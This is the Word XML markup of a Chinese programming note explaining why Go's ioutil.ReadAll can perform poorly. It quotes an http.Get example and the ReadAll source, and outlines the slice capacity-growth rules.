    <w:p w14:paraId="60DC8089" w14:textId="77777777" w:rsidR="002E0B0B" w:rsidRDefault="002E0B0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049D6776" w14:textId="6244FA4C" w:rsidR="00282FF1" w:rsidRDefault="00282FF1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B431AB1" w14:textId="07D5B1DB" w:rsidR="00282FF1" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么避免使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r>
        <w:t>util</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.ReadALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9EAABC" w14:textId="77777777" w:rsidR="008832F3" w:rsidRDefault="008832F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3808C883" w14:textId="77777777" w:rsidR="008832F3" w:rsidRPr="007509F8" w:rsidRDefault="008832F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="007509F8">
        <w:t>https://juejin.cn/post/7049979264183074847</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14D0E9" w14:textId="359F56E2" w:rsidR="008832F3" w:rsidRPr="008832F3" w:rsidRDefault="008832F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD4E695" w14:textId="77777777" w:rsidR="008832F3" w:rsidRPr="008832F3" w:rsidRDefault="008832F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE2DF54" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E6259" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>res, err := http.Get("http://www.google.com/robots.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FB916" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC6925" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA7659" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B203A" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF0407E" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">robots, err := </w:t>
      </w:r>
      <w:r w:rsidRPr="00333BAC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>io.ReadAll(res.Body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E6D911" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>res.Body.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E226353" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384954A0" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70404022" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE95987" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Printf("%s", robots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C6F93" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F14B05" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7D8F5" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">http.Get() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的数据，存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> res.Body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ioutil.ReadAll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其读取出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAF630" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表面上看这段代码没有什么问题，但仔细分析却并非如此。想要探究其背后的原因，就只能靠源码说话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E735D45" w14:textId="58E0E497" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F2F80A" w14:textId="01D6E5E0" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00333BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ioutil.ReadAll </w:t>
      </w:r>
      <w:r w:rsidRPr="00333BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的源码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F228A6D" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// src/io/ioutil/ioutil.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B253591" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D84B778" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func ReadAll(r io.Reader) ([]byte, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F4E7C" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00333BAC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>io.ReadAll(r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE5151" w14:textId="49F2C75C" w:rsidR="007509F8" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49383ACE" w14:textId="0D34CC2D" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2D414B" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Go 1.16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本开始，直接调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> io.ReadAll() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，下面再看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> io.ReadAll() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592ED461" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// src/io/io.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74966A12" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497036C4" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func ReadAll(r Reader) ([]byte, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F1CB5A" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 512 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071326D9" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>b := make([]byte, 0, 512)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5FCB9" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7CE6ED" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if len(b) == cap(b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3E1E5" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>满了，则追加一个元素，使其重新分配内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDF930" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>b = append(b, 0)[:len(b)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D8EF7" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE25C1E" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取内容到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4C231" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>n, err := r.Read(b[len(b):cap(b)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA9CBB" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>b = b[:len(b)+n]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB7DFD" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇到结尾或者报错则返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D1466" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68145D73" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if err == EOF {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70520128" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>err = nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15034974" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25AC9A" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return b, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B5208" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466DEB1" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4979E15A" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6003EB" w14:textId="4DA255EC" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540E949E" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我给代码加上了必要的注释，这段代码的执行主要分三个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68483D" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A83A02" w14:textId="1E57423F" w:rsidR="005E006C" w:rsidRDefault="00C171FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 512 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC61D23" w14:textId="39D14F67" w:rsidR="005E006C" w:rsidRDefault="00C171FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不断读取内容到</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，当</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>满的时候，会追加一个元素，促使其重新分配内存；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458D3AF" w14:textId="04E8C123" w:rsidR="005E006C" w:rsidRDefault="00C171FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直到结尾或报错，则返回；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD9FBD" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA5F438" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>知道了执行步骤，但想要分析其性能问题，还需要了解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切片的扩容策略，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0896EB07" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C3277D" w14:textId="4837F9B3" w:rsidR="005E006C" w:rsidRDefault="00C171FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果期望容量大于当前容量的两倍就会使用期望容量；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEA5DF" w14:textId="2B6E01BC" w:rsidR="005E006C" w:rsidRDefault="00C171FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果当前切片的长度小于</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1024 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会将容量翻倍；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE5673" w14:textId="1B66F084" w:rsidR="005E006C" w:rsidRDefault="00C171FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果当前切片的长度大于</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1024 </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会每次增加</w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 25% </w:t>
      </w:r>
      <w:r w:rsidR="005E006C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的容量，直到新容量大于期望容量；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0725C3" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
